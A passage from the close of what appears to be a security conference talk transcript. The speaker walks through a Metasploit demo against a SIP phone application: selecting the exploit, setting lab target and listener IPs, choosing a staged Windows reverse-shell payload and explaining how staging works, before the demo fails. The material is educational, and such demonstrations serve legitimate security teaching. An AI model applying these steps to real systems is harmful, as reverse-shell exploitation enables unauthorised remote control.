and then you just hope for something to come back. All right. Let me now show you how this works within Metasploit. So I run MSF console and I say use my SipX. There we are, show options. I need to give it the target address, so I say set our host 192.168.7.176. The port is okay. Now let us see payloads. Say show payloads. We have a lot of Windows payloads available at our disposal. Let me select a staged reverse shell. So I say set payload to be Win32 reverse STG. A staged shell actually goes in two parts. It first sends a small stage, which is the loader. This is if you don't have enough space, you just send a loader. The loader will clear off some part of the memory and wait for you to send another whole chunk of code, which it will load at that newly cleared memory and pass you control through it. So it's like, yeah, basically creating a small hole, putting a little pipe through it, sending across all your tools, and then widening the hole and jumping right in. So I say set this payload. To do this, you actually need a payload handler at your client end, which after the first payload is gone, it'll come back with a connection saying, hey, please give me the second part of the payload. And if you don't have a payload handler, it's just going to crash. Metasploit can also do the part of handling the payload for you. So here I have I've set the payload. Let me say show options. Let me see if I've got it all correct. No, I need the listener host. So I say set listener host or local host, which is my IP address, .168.7.41. And now I say exploit. Trying this, exiting reverse handler. Nope, it bombed. Okay. I knew it was going to bomb. And the SIP phone is dead. Okay, let me start another one up. Just a sec. Okay, I'm going to choose another payload. I say set payload as Win32 reverse. Okay, I do this. Something went wrong with the stage. I don't know why. I don't have time to debug it right now. But okay, ready to go with this. Let's say exploit. So I hit exploit. And I'm not getting any luck. Alright, I think I screwed up this demo, but assume that it would have worked and you'd have got a shell. So I knew something had to go wrong, right? The demo gods always have to heckle you. They heckled me at the end. But very sorry. Anyway, this was pretty much the end of the talk. I just wanted to give you a tour of how you can do exploit development with Metasploit and plugins. We've run out of time, so I'll be around. Sir? Yeah, we can take some questions for the next 5 minutes, or if you guys need to go for lunch, go ahead. I'll be around the conference. Feel free to come and bug me at any time. Any questions?